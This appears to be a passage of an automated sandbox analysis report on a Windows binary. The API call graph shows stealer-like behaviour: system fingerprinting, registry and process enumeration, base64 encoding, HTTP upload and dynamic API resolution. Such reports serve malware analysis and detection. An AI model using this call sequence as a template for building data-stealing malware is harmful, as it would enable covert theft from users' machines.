API calls 14528->14529 14530 525e54 14529->14530 14531 53a8a0 lstrcpy 14530->14531 14532 525e5d 14531->14532 14533 525e70 lstrlen 14532->14533 15329 53aad0 14533->15329 14535 525e81 lstrlen GetProcessHeap RtlAllocateHeap 15330 53aad0 14535->15330 14537 525eae lstrlen 14538 525ebe 14537->14538 14539 525ed7 lstrlen 14538->14539 14540 525ee7 14539->14540 14541 525ef0 lstrlen 14540->14541 14542 525f04 14541->14542 14543 525f1a lstrlen 14542->14543 15331 53aad0 14543->15331 14545 525f2a HttpSendRequestA 14546 525f35 InternetReadFile 14545->14546 14547 525f6a InternetCloseHandle 14546->14547 14551 525f61 14546->14551 14547->14471 14549 53a9b0 4 API calls 14549->14551 14550 53a8a0 lstrcpy 14550->14551 14551->14546 14551->14547 14551->14549 14551->14550 14554 531077 14552->14554 14553 531151 14553->13323 14554->14553 14555 53a820 lstrlen lstrcpy 14554->14555 14555->14554 14562 530db7 14556->14562 14557 530f17 14557->13331 14558 530e27 StrCmpCA 14558->14562 14559 530e67 StrCmpCA 14559->14562 14560 530ea4 StrCmpCA 14560->14562 14561 53a820 lstrlen lstrcpy 14561->14562 14562->14557 14562->14558 14562->14559 14562->14560 14562->14561 14564 530f67 14563->14564 14565 531044 14564->14565 14566 530fb2 StrCmpCA 14564->14566 14567 53a820 lstrlen lstrcpy 14564->14567 14565->13339 14566->14564 14567->14564 14569 53a740 lstrcpy 14568->14569 14570 531a26 14569->14570 14571 53a9b0 4 API calls 14570->14571 14572 531a37 14571->14572 14573 53a8a0 lstrcpy 14572->14573 14574 531a40 14573->14574 14575 53a9b0 4 API calls 14574->14575 14576 531a5b 14575->14576 14577 53a8a0 lstrcpy 14576->14577 14578 531a64 14577->14578 14579 53a9b0 4 API calls 14578->14579 14580 531a7d 14579->14580 14581 53a8a0 lstrcpy 14580->14581 14582 531a86 14581->14582 14583 53a9b0 4 API calls 14582->14583 14584 531aa1 14583->14584 14585 53a8a0 lstrcpy 14584->14585 14586 531aaa 14585->14586 14587 53a9b0 4 API calls 14586->14587 14588 531ac3 14587->14588 14589 53a8a0 lstrcpy 14588->14589 14590 531acc 14589->14590 14591 53a9b0 4 API calls 14590->14591 14592 531ae7 14591->14592 14593 53a8a0 lstrcpy 14592->14593 14594 531af0 14593->14594 14595 53a9b0 4 API calls 14594->14595 14596 531b09 14595->14596 14597 53a8a0 lstrcpy 14596->14597 14598 531b12 14597->14598 14599 53a9b0 4 API calls 14598->14599 14600 531b2d 14599->14600 14601 53a8a0 lstrcpy 14600->14601 14602 531b36 14601->14602 14603 53a9b0 4 API calls 14602->14603 14604 531b4f 14603->14604 14605 53a8a0 lstrcpy 14604->14605 14606 531b58 14605->14606 14607 53a9b0 4 API calls 14606->14607 14608 531b76 14607->14608 14609 53a8a0 lstrcpy 14608->14609 14610 531b7f 14609->14610 14611 537500 6 API calls 14610->14611 14612 531b96 14611->14612 14613 53a920 3 API calls 14612->14613 14614 531ba9 14613->14614 14615 53a8a0 lstrcpy 14614->14615 14616 531bb2 14615->14616 14617 53a9b0 4 API calls 14616->14617 14618 531bdc 14617->14618 14619 53a8a0 lstrcpy 14618->14619 14620 531be5 14619->14620 14621 53a9b0 4 API calls 14620->14621 14622 531c05 14621->14622 14623 53a8a0 lstrcpy 14622->14623 14624 531c0e 14623->14624 15332 537690 GetProcessHeap RtlAllocateHeap 14624->15332 14627 53a9b0 4 API calls 14628 531c2e 14627->14628 14629 53a8a0 lstrcpy 14628->14629 14630 531c37 14629->14630 14631 53a9b0 4 API calls 14630->14631 14632 531c56 14631->14632 14633 53a8a0 lstrcpy 14632->14633 14634 531c5f 14633->14634 14635 53a9b0 4 API calls 14634->14635 14636 531c80 14635->14636 14637 53a8a0 lstrcpy 14636->14637 14638 531c89 14637->14638 15339 5377c0 GetCurrentProcess IsWow64Process 14638->15339 14641 53a9b0 4 API calls 14642 531ca9 14641->14642 14643 53a8a0 lstrcpy 14642->14643 14644 531cb2 14643->14644 14645 53a9b0 4 API calls 14644->14645 14646 531cd1 14645->14646 14647 53a8a0 lstrcpy 14646->14647 14648 531cda 14647->14648 14649 53a9b0 4 API calls 14648->14649 14650 531cfb 14649->14650 14651 53a8a0 lstrcpy 14650->14651 14652 531d04 14651->14652 14653 537850 3 API calls 14652->14653 14654 531d14 14653->14654 14655 53a9b0 4 API calls 14654->14655 14656 531d24 14655->14656 14657 53a8a0 lstrcpy 14656->14657 14658 531d2d 14657->14658 14659 53a9b0 4 API calls 14658->14659 14660 531d4c 14659->14660 14661 53a8a0 lstrcpy 14660->14661 14662 531d55 14661->14662 14663 53a9b0 4 API calls 14662->14663 14664 531d75 14663->14664 14665 53a8a0 lstrcpy 14664->14665 14666 531d7e 14665->14666 14667 5378e0 3 API calls 14666->14667 14668 531d8e 14667->14668 14669 53a9b0 4 API calls 14668->14669 14670 531d9e 14669->14670 14671 53a8a0 lstrcpy 14670->14671 14672 531da7 14671->14672 14673 53a9b0 4 API calls 14672->14673 14674 531dc6 14673->14674 14675 53a8a0 lstrcpy 14674->14675 14676 531dcf 14675->14676 14677 53a9b0 4 API calls 14676->14677 14678 531df0 14677->14678 14679 53a8a0 lstrcpy 14678->14679 14680 531df9 14679->14680 15341 537980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 14680->15341 14683 53a9b0 4 API calls 14684 531e19 14683->14684 14685 53a8a0 lstrcpy 14684->14685 14686 531e22 14685->14686 14687 53a9b0 4 API calls 14686->14687 14688 531e41 14687->14688 14689 53a8a0 lstrcpy 14688->14689 14690 531e4a 14689->14690 14691 53a9b0 4 API calls 14690->14691 14692 531e6b 14691->14692 14693 53a8a0 lstrcpy 14692->14693 14694 531e74 14693->14694 15343 537a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 14694->15343 14697 53a9b0 4 API calls 14698 531e94 14697->14698 14699 53a8a0 lstrcpy 14698->14699 14700 531e9d 14699->14700 14701 53a9b0 4 API calls 14700->14701 14702 531ebc 14701->14702 14703 53a8a0 lstrcpy 14702->14703 14704 531ec5 14703->14704 14705 53a9b0 4 API calls 14704->14705 14706 531ee5 14705->14706 14707 53a8a0 lstrcpy 14706->14707 14708 531eee 14707->14708 15346 537b00 GetUserDefaultLocaleName 14708->15346 14711 53a9b0 4 API calls 14712 531f0e 14711->14712 14713 53a8a0 lstrcpy 14712->14713 14714 531f17 14713->14714 14715 53a9b0 4 API calls 14714->14715 14716 531f36 14715->14716 14717 53a8a0 lstrcpy 14716->14717 14718 531f3f 14717->14718 14719 53a9b0 4 API calls 14718->14719 14720 531f60 14719->14720 14721 53a8a0 lstrcpy 14720->14721 14722 531f69 14721->14722 15350 537b90 14722->15350 14724 531f80 14725 53a920 3 API calls 14724->14725 14726 531f93 14725->14726 14727 53a8a0 lstrcpy 14726->14727 14728 531f9c 14727->14728 14729 53a9b0 4 API calls 14728->14729 14730 531fc6 14729->14730 14731 53a8a0 lstrcpy 14730->14731 14732 531fcf 14731->14732 14733 53a9b0 4 API calls 14732->14733 14734 531fef 14733->14734 14735 53a8a0 lstrcpy 14734->14735 14736 531ff8 14735->14736 15362 537d80 GetSystemPowerStatus 14736->15362 14739 53a9b0 4 API calls 14740 532018 14739->14740 14741 53a8a0 lstrcpy 14740->14741 14742 532021 14741->14742 14743 53a9b0 4 API calls 14742->14743 14744 532040 14743->14744 14745 53a8a0 lstrcpy 14744->14745 14746 532049 14745->14746 14747 53a9b0 4 API calls 14746->14747 14748 53206a 14747->14748 14749 53a8a0 lstrcpy 14748->14749 14750 532073 14749->14750 14751 53207e GetCurrentProcessId 14750->14751 15364 539470 OpenProcess 14751->15364 14754 53a920 3 API calls 14755 5320a4 14754->14755 14756 53a8a0 lstrcpy 14755->14756 14757 5320ad 14756->14757 14758 53a9b0 4 API calls 14757->14758 14759 5320d7 14758->14759 14760 53a8a0 lstrcpy 14759->14760 14761 5320e0 14760->14761 14762 53a9b0 4 API calls 14761->14762 14763 532100 14762->14763 14764 53a8a0 lstrcpy 14763->14764 14765 532109 14764->14765 15369 537e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 14765->15369 14768 53a9b0 4 API calls 14769 532129 14768->14769 14770 53a8a0 lstrcpy 14769->14770 14771 532132 14770->14771 14772 53a9b0 4 API calls 14771->14772 14773 532151 14772->14773 14774 53a8a0 lstrcpy 14773->14774 14775 53215a 14774->14775 14776 53a9b0 4 API calls 14775->14776 14777 53217b 14776->14777 14778 53a8a0 lstrcpy 14777->14778 14779 532184 14778->14779 15373 537f60 14779->15373 14782 53a9b0 4 API calls 14783 5321a4 14782->14783 14784 53a8a0 lstrcpy 14783->14784 14785 5321ad 14784->14785 14786 53a9b0 4 API calls 14785->14786 14787 5321cc 14786->14787 14788 53a8a0 lstrcpy 14787->14788 14789 5321d5 14788->14789 14790 53a9b0 4 API calls 14789->14790 14791 5321f6 14790->14791 14792 53a8a0 lstrcpy 14791->14792 14793 5321ff 14792->14793 15386 537ed0 GetSystemInfo wsprintfA 14793->15386 14796 53a9b0 4 API calls 14797 53221f 14796->14797 14798 53a8a0 lstrcpy 14797->14798 14799 532228 14798->14799 14800 53a9b0 4 API calls 14799->14800 14801 532247 14800->14801 14802 53a8a0 lstrcpy 14801->14802 14803 532250 14802->14803 14804 53a9b0 4 API calls 14803->14804 14805 532270 14804->14805 14806 53a8a0 lstrcpy 14805->14806 14807 532279 14806->14807 15388 538100 GetProcessHeap RtlAllocateHeap 14807->15388 14810 53a9b0 4 API calls 14811 532299 14810->14811 14812 53a8a0 lstrcpy 14811->14812 14813 5322a2 14812->14813 14814 53a9b0 4 API calls 14813->14814 14815 5322c1 14814->14815 14816 53a8a0 lstrcpy 14815->14816 14817 5322ca 14816->14817 14818 53a9b0 4 API calls 14817->14818 14819 5322eb 14818->14819 14820 53a8a0 lstrcpy 14819->14820 14821 5322f4 14820->14821 15394 5387c0 14821->15394 14824 53a920 3 API calls 14825 53231e 14824->14825 14826 53a8a0 lstrcpy 14825->14826 14827 532327 14826->14827 14828 53a9b0 4 API calls 14827->14828 14829 532351 14828->14829 14830 53a8a0 lstrcpy 14829->14830 14831 53235a 14830->14831 14832 53a9b0 4 API calls 14831->14832 14833 53237a 14832->14833 14834 53a8a0 lstrcpy 14833->14834 14835 532383 14834->14835 14836 53a9b0 4 API calls 14835->14836 14837 5323a2 14836->14837 14838 53a8a0 lstrcpy 14837->14838 14839 5323ab 14838->14839 15399 5381f0 14839->15399 14841 5323c2 14842 53a920 3 API calls 14841->14842 14843 5323d5 14842->14843 14844 53a8a0 lstrcpy 14843->14844 14845 5323de 14844->14845 14846 53a9b0 4 API calls 14845->14846 14847 53240a 14846->14847 14848 53a8a0 lstrcpy 14847->14848 14849 532413 14848->14849 14850 53a9b0 4 API calls 14849->14850 14851 532432 14850->14851 14852 53a8a0 lstrcpy 14851->14852 14853 53243b 14852->14853 14854 53a9b0 4 API calls 14853->14854 14855 53245c 14854->14855 14856 53a8a0 lstrcpy 14855->14856 14857 532465 14856->14857 14858 53a9b0 4 API calls 14857->14858 14859 532484 14858->14859 14860 53a8a0 lstrcpy 14859->14860 14861 53248d 14860->14861 14862 53a9b0 4 API calls 14861->14862 14863 5324ae 14862->14863 14864 53a8a0 lstrcpy 14863->14864 14865 5324b7 14864->14865 15407 538320 14865->15407 14867 5324d3 14868 53a920 3 API calls 14867->14868 14869 5324e6 14868->14869 14870 53a8a0 lstrcpy 14869->14870 14871 5324ef 14870->14871 14872 53a9b0 4 API calls 14871->14872 14873 532519 14872->14873 14874 53a8a0 lstrcpy 14873->14874 14875 532522 14874->14875 14876 53a9b0 4 API calls 14875->14876 14877 532543 14876->14877 14878 53a8a0 lstrcpy 14877->14878 14879 53254c 14878->14879 14880 538320 17 API calls 14879->14880 14881 532568 14880->14881 14882 53a920 3 API calls 14881->14882 14883 53257b 14882->14883 14884 53a8a0 lstrcpy 14883->14884 14885 532584 14884->14885 14886 53a9b0 4 API calls 14885->14886 14887 5325ae 14886->14887 14888 53a8a0 lstrcpy 14887->14888 14889 5325b7 14888->14889 14890 53a9b0 4 API calls 14889->14890 14891 5325d6 14890->14891 14892 53a8a0 lstrcpy 14891->14892 14893 5325df 14892->14893 14894 53a9b0 4 API calls 14893->14894 14895 532600 14894->14895 14896 53a8a0 lstrcpy 14895->14896 14897 532609 14896->14897 15443 538680 14897->15443 14899 532620 14900 53a920 3 API calls 14899->14900 14901 532633 14900->14901 14902 53a8a0 lstrcpy 14901->14902 14903 53263c 14902->14903 14904 53265a lstrlen 14903->14904 14905 53266a 14904->14905 14906 53a740 lstrcpy 14905->14906 14907 53267c 14906->14907 14908 521590 lstrcpy 14907->14908 14909 53268d 14908->14909 15453 535190 14909->15453 14911 532699 14911->13343 15641 53aad0 14912->15641 14914 525009 InternetOpenUrlA 14918 525021 14914->14918 14915 5250a0 InternetCloseHandle InternetCloseHandle 14917 5250ec 14915->14917 14916 52502a InternetReadFile 14916->14918 14917->13347 14918->14915 14918->14916 15642 5298d0 14919->15642 14921 530759 14922 530a38 14921->14922 14923 53077d 14921->14923 14924 521590 lstrcpy 14922->14924 14925 530799 StrCmpCA 14923->14925 14926 530a49 14924->14926 14927 530843 14925->14927 14928 5307a8 14925->14928 15818 530250 14926->15818 14932 530865 StrCmpCA 14927->14932 14931 53a7a0 lstrcpy 14928->14931 14933 5307c3 14931->14933 14934 530874 14932->14934 14971 53096b 14932->14971 14935 521590 lstrcpy 14933->14935 14936 53a740 lstrcpy 14934->14936 14937 53080c 14935->14937 14939 530881 14936->14939 14940 53a7a0 lstrcpy 14937->14940 14938 53099c StrCmpCA 14941 530a2d 14938->14941 14942 5309ab 14938->14942 14943 53a9b0 4 API calls 14939->14943 14944 530823 14940->14944 14941->13351 14945 521590 lstrcpy 14942->14945 14946 5308ac 14943->14946 14947 53a7a0 lstrcpy 14944->14947 14948 5309f4 14945->14948 14949 53a920 3 API calls 14946->14949 14950 53083e 14947->14950 14951 53a7a0 lstrcpy 14948->14951 14952 5308b3 14949->14952 15645 52fb00 14950->15645 14954 530a0d 14951->14954 14955 53a9b0 4 API calls 14952->14955 14956 53a7a0 lstrcpy 14954->14956 14957 5308ba 14955->14957 14958 530a28 14956->14958 14959 53a8a0 lstrcpy 14957->14959 15761 530030 14958->15761 14971->14938 15293 53a7a0 lstrcpy 15292->15293 15294 521683 15293->15294 15295 53a7a0 lstrcpy 15294->15295 15296 521695 15295->15296 15297 53a7a0 lstrcpy 15296->15297 15298 5216a7 15297->15298 15299 53a7a0 lstrcpy 15298->15299 15300 5215a3 15299->15300 15300->14174 15302 5247c6 15301->15302 15303 524838 lstrlen 15302->15303 15327 53aad0 15303->15327 15305 524848 InternetCrackUrlA 15306 524867 15305->15306 15306->14251 15308 53a740 lstrcpy 15307->15308 15309 538b74 15308->15309 15310 53a740 lstrcpy 15309->15310 15311 538b82 GetSystemTime 15310->15311 15313 538b99 15311->15313 15312 53a7a0 lstrcpy 15314 538bfc 15312->15314 15313->15312 15314->14266 15316 53a931 15315->15316 15317 53a988 15316->15317 15319 53a968 lstrcpy lstrcat 15316->15319 15318 53a7a0 lstrcpy 15317->15318 15320 53a994 15318->15320 15319->15317 15320->14269 15322 524eee 15321->15322 15323 529af9 LocalAlloc 15321->15323 15322->14272 15322->14274 15323->15322 15324 529b14 CryptStringToBinaryA 15323->15324 15324->15322 15325 529b39 LocalFree 15324->15325 15325->15322 15326->14384 15327->15305 15328->14394 15329->14535 15330->14537 15331->14545 15460 5377a0 15332->15460 15335 5376c6 RegOpenKeyExA 15337 5376e7 RegQueryValueExA 15335->15337 15338 537704 RegCloseKey 15335->15338 15336 531c1e 15336->14627 15337->15338 15338->15336 15340 531c99 15339->15340 15340->14641 15342 531e09 15341->15342 15342->14683 15344 531e84 15343->15344 15345 537a9a wsprintfA 15343->15345 15344->14697 15345->15344 15347 531efe 15346->15347 15348 537b4d 15346->15348 15347->14711 15467 538d20 LocalAlloc CharToOemW 15348->15467 15351 53a740 lstrcpy 15350->15351 15352 537bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15351->15352 15361 537c25 15352->15361 15353 537c46 GetLocaleInfoA 15353->15361 15354 537d18 15355 537d28 15354->15355 15356 537d1e LocalFree 15354->15356 15357 53a7a0 lstrcpy 15355->15357 15356->15355 15360 537d37 15357->15360 15358 53a8a0 lstrcpy 15358->15361 15359 53a9b0 lstrcpy lstrlen lstrcpy lstrcat 15359->15361 15360->14724 15361->15353 15361->15354 15361->15358 15361->15359 15363 532008 15362->15363 15363->14739 15365 539493 GetModuleFileNameExA CloseHandle 15364->15365 15366 5394b5 15364->15366 15365->15366 15367 53a740 lstrcpy 15366->15367 15368 532091 15367->15368 15368->14754 15370 532119 15369->15370 15371 537e68 RegQueryValueExA 15369->15371 15370->14768 15372 537e8e RegCloseKey 15371->15372 15372->15370 15374 537fb9 GetLogicalProcessorInformationEx 15373->15374 15375 537fd8 GetLastError 15374->15375 15382 538029 15374->15382 15378 538022 15375->15378 15385 537fe3 15375->15385 15379 532194 15378->15379 15381 5389f0 2 API calls 15378->15381 15379->14782 15380 5389f0 2 API calls 15383 53807b 15380->15383 15381->15379 15382->15380 15383->15378 15384 538084 wsprintfA 15383->15384 15384->15379 15385->15374 15385->15379 15468 5389f0 15385->15468 15471 538a10 GetProcessHeap RtlAllocateHeap 15385->15471 15387 53220f 15386->15387 15387->14796 15389 5389b0 15388->15389 15390 53814d GlobalMemoryStatusEx 15389->15390 15391 538163 __aulldiv 15390->15391 15392 53819b wsprintfA 15391->15392 15393 532289 15392->15393 15393->14810 15395 5387fb GetProcessHeap RtlAllocateHeap wsprintfA 15394->15395 15397 53a740 lstrcpy 15395->15397 15398 53230b 15397->15398 15398->14824 15400 53a740 lstrcpy 15399->15400 15402 538229 15400->15402 15401 538263 15404 53a7a0 lstrcpy 15401->15404 15402->15401 15403 53a9b0 lstrcpy lstrlen lstrcpy lstrcat 15402->15403 15406 53a8a0 lstrcpy 15402->15406 15403->15402 15405 5382dc 15404->15405 15405->14841 15406->15402 15408 53a740 lstrcpy 15407->15408 15409 53835c RegOpenKeyExA 15408->15409 15410 5383d0 15409->15410 15411 5383ae 15409->15411 15413 538613 RegCloseKey 15410->15413 15414 5383f8 RegEnumKeyExA 15410->15414 15412 53a7a0 lstrcpy 15411->15412 15423 5383bd 15412->15423 15415 53a7a0 lstrcpy 15413->15415 15416 53843f wsprintfA RegOpenKeyExA 15414->15416 15417 53860e 15414->15417 15415->15423 15418 5384c1 RegQueryValueExA 15416->15418 15419 538485 RegCloseKey RegCloseKey 15416->15419 15417->15413 15420 538601 RegCloseKey 15418->15420 15421 5384fa lstrlen 15418->15421 15422 53a7a0 lstrcpy 15419->15422 15420->15417 15421->15420 15424 538510 15421->15424 15422->15423 15423->14867 15425 53a9b0 4 API calls 15424->15425 15426 538527 15425->15426 15427 53a8a0 lstrcpy 15426->15427 15428 538533 15427->15428 15429 53a9b0 4 API calls 15428->15429 15430 538557 15429->15430 15431 53a8a0 lstrcpy 15430->15431 15432 538563 15431->15432 15433 53856e RegQueryValueExA 15432->15433 15433->15420 15434 5385a3 15433->15434 15435 53a9b0 4 API calls 15434->15435 15436 5385ba 15435->15436 15437 53a8a0 lstrcpy 15436->15437 15438 5385c6 15437->15438 15439 53a9b0 4 API calls 15438->15439 15440 5385ea 15439->15440 15441 53a8a0 lstrcpy 15440->15441 15442 5385f6 15441->15442 15442->15420 15444 53a740 lstrcpy 15443->15444 15445 5386bc CreateToolhelp32Snapshot Process32First 15444->15445 15446 5386e8 Process32Next 15445->15446 15447 53875d CloseHandle 15445->15447 15446->15447 15452 5386fd 15446->15452 15448 53a7a0 lstrcpy 15447->15448 15449 538776 15448->15449 15449->14899 15450 53a9b0 lstrcpy lstrlen lstrcpy lstrcat 15450->15452 15451 53a8a0 lstrcpy 15451->15452 15452->15446 15452->15450 15452->15451 15454 53a7a0 lstrcpy 15453->15454 15455 5351b5 15454->15455 15456 521590 lstrcpy 15455->15456 15457 5351c6 15456->15457 15472 525100 15457->15472 15459 5351cf 15459->14911 15463 537720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15460->15463 15462 5376b9 15462->15335 15462->15336 15464 537780 RegCloseKey 15463->15464 15465 537765 RegQueryValueExA 15463->15465 15466 537793 15464->15466 15465->15464 15466->15462 15467->15347 15469 5389f9 GetProcessHeap HeapFree 15468->15469 15470 538a0c 15468->15470 15469->15470 15470->15385 15471->15385 15473 53a7a0 lstrcpy 15472->15473 15474 525119 15473->15474 15475 5247b0 2 API calls 15474->15475 15476 525125 15475->15476 15632 538ea0 15476->15632 15478 525184 15479 525192 lstrlen 15478->15479 15480 5251a5 15479->15480 15481 538ea0 4 API calls 15480->15481 15482 5251b6 15481->15482 15483 53a740 lstrcpy 15482->15483 15484 5251c9 15483->15484 15485 53a740 lstrcpy 15484->15485 15486 5251d6 15485->15486 15487 53a740 lstrcpy 15486->15487 15488 5251e3 15487->15488 15489 53a740 lstrcpy 15488->15489 15490 5251f0 15489->15490 15491 53a740 lstrcpy 15490->15491 15492 5251fd InternetOpenA StrCmpCA 15491->15492 15493 52522f 15492->15493 15494 5258c4 InternetCloseHandle 15493->15494 15495 538b60 3 API calls 15493->15495 15501 5258d9 ctype 15494->15501 15496 52524e 15495->15496 15497 53a920 3 API calls 15496->15497 15498 525261 15497->15498 15499 53a8a0 lstrcpy 15498->15499 15500 52526a 15499->15500 15502 53a9b0 4 API calls 15500->15502 15504 53a7a0 lstrcpy 15501->15504 15503 5252ab 15502->15503 15505 53a920 3 API calls 15503->15505 15513 525913 15504->15513 15506 5252b2 15505->15506 15507 53a9b0 4 API calls 15506->15507 15508 5252b9 15507->15508 15509 53a8a0 lstrcpy 15508->15509 15510 5252c2 15509->15510 15511 53a9b0 4 API calls 15510->15511 15512 525303 15511->15512 15514 53a920 3 API calls 15512->15514 15513->15459 15515 52530a 15514->15515 15516 53a8a0 lstrcpy 15515->15516 15517 525313 15516->15517 15518 525329 InternetConnectA 15517->15518 15518->15494 15519 525359 HttpOpenRequestA 15518->15519 15521 5258b7 InternetCloseHandle 15519->15521 15522 5253b7 15519->15522 15521->15494 15523 53a9b0 4 API calls 15522->15523 15524 5253cb 15523->15524 15525 53a8a0 lstrcpy 15524->15525 15526 5253d4 15525->15526 15527 53a920 3 API calls 15526->15527 15528 5253f2 15527->15528 15529 53a8a0 lstrcpy 15528->15529 15530 5253fb 15529->15530 15531 53a9b0 4 API calls 15530->15531 15532 52541a 15531->15532 15533 53a8a0 lstrcpy 15532->15533 15534 525423 15533->15534 15535 53a9b0 4 API calls 15534->15535 15536 525444 15535->15536 15537 53a8a0 lstrcpy 15536->15537 15538 52544d 15537->15538 15539 53a9b0 4 API calls 15538->15539 15540 52546e 15539->15540 15541 53a8a0 lstrcpy 15540->15541 15633 538ea9 15632->15633 15634 538ead CryptBinaryToStringA 15632->15634 15633->15478 15634->15633 15635 538ece GetProcessHeap RtlAllocateHeap 15634->15635 15635->15633 15636 538ef4 ctype 15635->15636 15637 538f05 CryptBinaryToStringA 15636->15637 15637->15633 15641->14914 15884 529880 15642->15884 15644 5298e1 15644->14921 15646 53a740 lstrcpy 15645->15646 15647 52fb16 15646->15647 15762 53a740 lstrcpy 15761->15762 15819 53a740 lstrcpy 15818->15819 15820 530266 15819->15820 15821 538de0 2 API calls 15820->15821 15822 53027b 15821->15822 15823 53a920 3 API calls 15822->15823 15824 53028b 15823->15824 15825 53a8a0 lstrcpy 15824->15825 15826 530294 15825->15826 15827 53a9b0 4 API calls 15826->15827 15828 5302b8 15827->15828 15885 52988d 15884->15885 15888 526fb0 15885->15888 15887 5298ad ctype 15887->15644 15891 526d40 15888->15891 15892 526d63 15891->15892 15899 526d59 15891->15899 15892->15899 15905 526660 15892->15905 15894 526dbe 15894->15899 15911 5269b0 15894->15911 15896 526e2a 15897 526ee6 VirtualFree 15896->15897 15896->15899 15900 526ef7 15896->15900 15897->15900 15898 526f41 15898->15899 15901 5389f0 2 API calls 15898->15901 15899->15887 15900->15898 15902 526f26 FreeLibrary 15900->15902 15903 526f38 15900->15903 15901->15899 15902->15900 15904 5389f0 2 API calls 15903->15904 15904->15898 15908 52668f VirtualAlloc 15905->15908 15907 526730 15909 526743 VirtualAlloc 15907->15909 15910 52673c 15907->15910 15908->15907 15908->15910 15909->15910 15910->15894 15912 5269c9 15911->15912 15916 5269d5 15911->15916 15913 526a09 LoadLibraryA 15912->15913 15912->15916 15914 526a32 15913->15914 15913->15916 15918 526ae0 15914->15918 15921 538a10 GetProcessHeap RtlAllocateHeap 15914->15921 15916->15896 15917 526ba8 GetProcAddress 15917->15916 15917->15918 15918->15916 15918->15917 15919 5389f0 2 API calls 15919->15918 15920 526a8b 15920->15916 15920->15919 15921->15920

                                      Executed Functions

                                      Function 00539860 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212libraryloaderCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 660 539860-539874 call 539750 663 539a93-539af2 LoadLibraryA * 5 660->663 664 53987a-539a8e call 539780 GetProcAddress * 21 660->664 666 539af4-539b08 GetProcAddress 663->666 667 539b0d-539b14 663->667 664->663 666->667 668 539b46-539b4d 667->668 669 539b16-539b41 GetProcAddress * 2 667->669 671 539b68-539b6f 668->671 672 539b4f-539b63 GetProcAddress 668->672 669->668 673 539b71-539b84 GetProcAddress 671->673 674 539b89-539b90 671->674 672->671 673->674 675 539b92-539bbc GetProcAddress * 2 674->675 676 539bc1-539bc2 674->676 675->676
                                      APIs
                                      • GetProcAddress.KERNEL32(74DD0000,00F12BA0), ref: 005398A1
                                      • GetProcAddress.KERNEL32(74DD0000,00F12CA8), ref: 005398BA
                                      • GetProcAddress.KERNEL32(74DD0000,00F12CC0), ref: 005398D2
                                      • GetProcAddress.KERNEL32(74DD0000,00F12B10), ref: 005398EA
                                      • GetProcAddress.KERNEL32(74DD0000,00F12C60), ref: 00539903
                                      • GetProcAddress.KERNEL32(74DD0000,00F19780), ref: 0053991B
                                      • GetProcAddress.KERNEL32(74DD0000,00F05C70), ref: 00539933
                                      • GetProcAddress.KERNEL32(74DD0000,00F05CB0), ref: 0053994C
                                      • GetProcAddress.KERNEL32(74DD0000,00F12A80), ref: 00539964
                                      • GetProcAddress.KERNEL32(74DD0000,00F12A98), ref: 0053997C
                                      • GetProcAddress.KERNEL32(74DD0000,00F12AE0), ref: 00539995
                                      • GetProcAddress.KERNEL32(74DD0000,00F12CD8), ref: 005399AD
                                      • GetProcAddress.KERNEL32(74DD0000,00F05CF0), ref: 005399C5
                                      • GetProcAddress.KERNEL32(74DD0000,00F12C78), ref: 005399DE
                                      • GetProcAddress.KERNEL32(74DD0000,00F12AB0), ref: 005399F6
                                      • GetProcAddress.KERNEL32(74DD0000,00F05DB0), ref: 00539A0E
                                      • GetProcAddress.KERNEL32(74DD0000,00F12B28), ref: 00539A27
                                      • GetProcAddress.KERNEL32(74DD0000,00F12BB8), ref: 00539A3F
                                      • GetProcAddress.KERNEL32(74DD0000,00F05C30), ref: 00539A57
                                      • GetProcAddress.KERNEL32(74DD0000,00F12B88), ref: 00539A70
                                      • GetProcAddress.KERNEL32(74DD0000,00F05B30), ref: 00539A88
                                      • LoadLibraryA.KERNEL32(00F12D50,?,00536A00), ref: 00539A9A
                                      • LoadLibraryA.KERNEL32(00F12D38,?,00536A00), ref: 00539AAB
                                      • LoadLibraryA.KERNEL32(00F12DC8,?,00536A00), ref: 00539ABD
                                      • LoadLibraryA.KERNEL32(00F12DB0,?,00536A00), ref: 00539ACF
                                      • LoadLibraryA.KERNEL32(00F12DE0,?,00536A00), ref: 00539AE0
                                      • GetProcAddress.KERNEL32(75A70000,00F12D20), ref: 00539B02
                                      • GetProcAddress.KERNEL32(75290000,00F12D68), ref: 00539B23
                                      • GetProcAddress.KERNEL32(75290000,00F12D80), ref: 00539B3B
                                      • GetProcAddress.KERNEL32(75BD0000,00F12D98), ref: 00539B5D
                                      • GetProcAddress.KERNEL32(75450000,00F05D10), ref: 00539B7E
                                      • GetProcAddress.KERNEL32(76E90000,00F197C0), ref: 00539B9F
                                      • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 00539BB6
                                      Strings
                                      • NtQueryInformationProcess, xrefs: 00539BAA
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      • Associated: 00000000.00000002.1766321931.0000000000520000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.0000000000602000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.000000000076A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A15000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A23000.00000040.00000001.01000000.00000003.sdmpDownload File
